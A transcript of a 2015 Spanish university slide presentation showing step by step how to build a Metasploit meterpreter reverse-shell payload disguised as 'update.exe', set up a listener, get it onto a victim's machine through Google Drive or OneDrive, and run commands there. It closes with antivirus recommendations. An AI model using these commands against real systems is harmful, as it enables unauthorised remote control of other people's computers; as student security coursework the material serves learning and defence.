Herramientas Para Hackear

10
HERRAMIENTAS PARA HACKEAR WINDOWS 7, WINDOWS 8 Christian Quirós Adriana Quirós Esteban Rodríguez UMCA 1 DE JUNIO DE 2015

description

Trabajo universitario

Transcript of Herramientas Para Hackear

  • HERRAMIENTAS PARA HACKEAR WINDOWS 7, WINDOWS 8

    Christian Quirs Adriana Quirs

    Esteban Rodrguez UMCA

    1 DE JUNIO DE 2015

  • Introduccin

    La seguridad informtica se encarga de proteger la privacidad y la integridad de la

    informacin de manera que permita asegurar los sistemas.

    Para cumplir lo anterior es importante usar nuestros conocimientos en informtica

    para realizar pruebas y encontrar las vulnerabilidades que un sistema o red puede

    tener.

    Actualmente, se encuentran en la web gran cantidad de programas, videos y

    manuales los cuales ensean mltiples formas de hurtar informacin. Incluso

    usuarios sin muchos conocimientos tcnicos pueden infringir cualquier sistema.

    El proyecto que a continuacin se desarrollar, es una investigacin de software

    gratuito que permite realizar ataques a cualquier sistema operativo y encontrar

    vulnerabilidades para tomar el control de otros equipos.

    Desde la creacin de una carpeta de forma remota hasta la eliminacin de

    archivos o apagar el equipo, son algunas de las acciones que se pudieron realizar.

    Al final de esta investigacin, pudimos comprobar que no todo lo que est

    publicado en la web es verdadero, y que es esencial estar preparado para

    enfrentar y proteger nuestra informacin

  • Kali Linux

    Kali Linux es una distribucin de Linux avanzada para pruebas de penetracin y

    auditoras de seguridad.

    Kali es la nueva versin del BackTrack Linux se adhiere completamente a los

    estndares de desarrollo de Debian. Cuenta con ms de 300 herramientas de

    penetracin y es gratuito.

    Con Kali, fue posible usar un cdigo malicioso para generar un PayLoad. El

    PayLoad es el cdigo o malware que se va a ejecutar en la mquina de la vctima

    el cual permitir que de forma remota se pueda realizar cualquier accin mediante

    comandos de DOS.

    Lo primero que realizamos fue ejecutar el Kali Linux dentro de una red luego

    abrimos una terminal

  • Buscamos nuestra IP con el comando: Ifconfig y presionamos Enter.

    La IP es un dato de suma importancia para generar nuestro payload.

    Para hacer el payload, en la consola debemos escribir:

    msfpayload Windows/meterpreter/reverse_tcp LHOST= nuestra direccin ip

    LPORT= 8080 x > /root/Desktop/update.exe

    El nombre del archivo puede ser cualquiera, siempre debe tener la extensin .exe.

  • Una vez que confirme las opciones, se ha generado satisfactoriamente el payload.

    Podemos tomar el archivo y enviarlo a algn Host para hackearlo.

  • Es importante abrir otra terminal y ejecutar el comando msfconsole

    Escribimos los siguientes comandos, despus de cada lnea debe presionar Enter:

    Use exploit/multi/handler set PAYLOAD Windows/meterpreter/reverse_tcp Set LHOST nuestra direccin IP Set LPORT 8080 exploit

  • En este momento quedamos a la espera que se ejecute el payload.

    Apenas el archivo sea ejecutado, se har una conexin entre la maquina nuestra y

    la vctima.

  • Una vez que se establezca la conexin podemos escribir el comando Shell para

    proceder a ejecutar comandos DOS dentro del equipo de la vctima.

  • Conclusiones y Recomendaciones

    En este proyecto pudimos comprobar que de manera gratuita se puede tener

    acceso a herramientas que infrinjan la seguridad de nuestros equipos.

    El payload generado y el exploit funcionan nicamente dentro de la misma red, se

    realizaron pruebas en distintas redes y no fue posible la conexin entre la vctima

    y la maquina atacante.

    Otro aspecto que resaltamos es que se necesita de ingeniera social para hacer

    llegar el ejecutable al equipo de la vctima, el enviarlo por correo no fue posible,

    debido a que todo ejecutable es detectado como malicioso y un potencial virus.

    Lo que si fue posible es subir el ejecutable a la nube mediante google Drive u

    Onedrive. De esta manera se logr compartir el archivo.

    La conexin se realiza cada vez que se ejecuta el archivo del payload, por lo que

    si se llega a apagar la maquina o pierde la conexin de red, no es posible seguir

    invadiendo la computadora de la vctima.

    Entre las recomendaciones que brindamos para evitar este tipo de intrusin estn:

    1. Tener un antivirus legalmente instalado.

    2. Contar con un antivirus actualizado.

    3. No desactivar el antivirus para realizar alguna instalacin si no se tiene la

    certeza del tipo de programa que se desea instalar.

    4. Escanear cualquier archivo antes de abrirlo.

    5. Crear ambientes de prueba virtuales para descargar exploits, keyloggers,

    troyanos ya que el infectado puede ser uno.

    6. Cerrar inmediatamente la pgina en caso que el navegador notifique que es

    un sitio o archivo inseguro.

  • Bibliografa

    http://es.docs.kali.org/introduction-es/que-es-kali-linux

    https://www.youtube.com/watch?v=qhJA_ZhdiGQ